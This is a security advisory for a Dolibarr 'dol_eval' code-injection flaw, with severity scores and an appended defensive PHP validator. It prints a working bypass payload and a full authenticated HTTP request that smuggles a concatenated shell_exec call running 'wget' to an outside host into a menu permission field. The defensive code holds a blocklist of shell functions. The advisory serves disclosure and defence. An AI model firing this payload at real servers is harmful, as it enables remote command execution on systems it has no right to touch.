CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 6.5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

EPSS: 0.002 Low (Percentile: 57.9%)
Improper sanitization of PHP functions leads to the ability to inject arbitrary PHP code and run arbitrary commands on the file system.
In the function “dol_eval” in the file “dolibarr/htdocs/core/lib/functions.lib.php”, dangerous PHP functions are sanitized using “str_replace”, which can be bypassed using the following code in the $s parameter:
('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')
A user with rights to add menus to the system can exploit this vulnerability with the following request:
POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Referer: http://192.168.255.78/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1

token=84da28fc90b6abc2238f2e0da2e5ee10&menu_handler=all&user=2&type=top&propertymainmenu=testtest&titre=testtest&url=testtest&langs=&position=100&target=&enabled=1&perms=%28%27she%27.%27ll_%27.%27ex%27.%27ec%27%29%28%27wget+https%3A%2F%2F<REDACTED>%27%29&save=Save
This vulnerability allows running arbitrary commands on the file system.
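Why substring replacement cannot stop the concatenation shown above, as an added PHP example that is not Dolibarr's code: `blocklist_filter` is a simplified stand-in for the “str_replace” approach, and `is_safe_condition`, the forbidden-name list and the sample expressions are assumptions made for illustration. Neither input is ever evaluated; the validator accepts only a small token allowlist, so calls and concatenation cannot be expressed at all.

```php
<?php
// Simplified stand-in for a str_replace blocklist; NOT Dolibarr's actual code.
// The forbidden-name list is constructed for illustration.
function blocklist_filter(string $s): string
{
    $forbidden = ['shell_exec', 'exec', 'system', 'passthru', 'eval'];
    return str_replace($forbidden, '__forbidden__', $s);
}

// Hypothetical allowlist validator: accept only variables, property access,
// literals and comparison/boolean operators. '(' and '.' are never accepted,
// so a function call or a name built by concatenation is rejected outright.
function is_safe_condition(string $s): bool
{
    $allowedIds = [T_WHITESPACE, T_VARIABLE, T_OBJECT_OPERATOR, T_LNUMBER,
        T_CONSTANT_ENCAPSED_STRING, T_BOOLEAN_AND, T_BOOLEAN_OR, T_IS_EQUAL,
        T_IS_NOT_EQUAL, T_IS_GREATER_OR_EQUAL, T_IS_SMALLER_OR_EQUAL];
    $allowedChars = ['!', '<', '>'];

    $tokens = token_get_all('<?php ' . $s);
    array_shift($tokens);                  // drop the T_OPEN_TAG added above
    $prev = null;
    foreach ($tokens as $tok) {
        if (is_string($tok)) {             // single-character token
            if (!in_array($tok, $allowedChars, true)) {
                return false;
            }
            $prev = $tok;
            continue;
        }
        [$id] = $tok;
        // A bare identifier is valid only as a property name right after '->'.
        $isProperty = ($id === T_STRING && $prev === T_OBJECT_OPERATOR);
        if (!$isProperty && !in_array($id, $allowedIds, true)) {
            return false;
        }
        $prev = $id;
    }
    return $tokens !== [];                 // an empty expression is not valid
}

// Constructed inputs: the concatenation pattern from the report (only
// inspected as text here) and a permission-style expression.
$bypass = "('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')";
$benign = '$user->rights->societe->lire && $conf->entity == 1';

var_dump(blocklist_filter($bypass) === $bypass); // did the blocklist alter it?
var_dump(is_safe_condition($bypass));            // verdict for the bypass string
var_dump(is_safe_condition($benign));            // verdict for the benign string
```

A validator like this is a gate in front of evaluation, not a replacement for removing `eval` from the code path where that is possible.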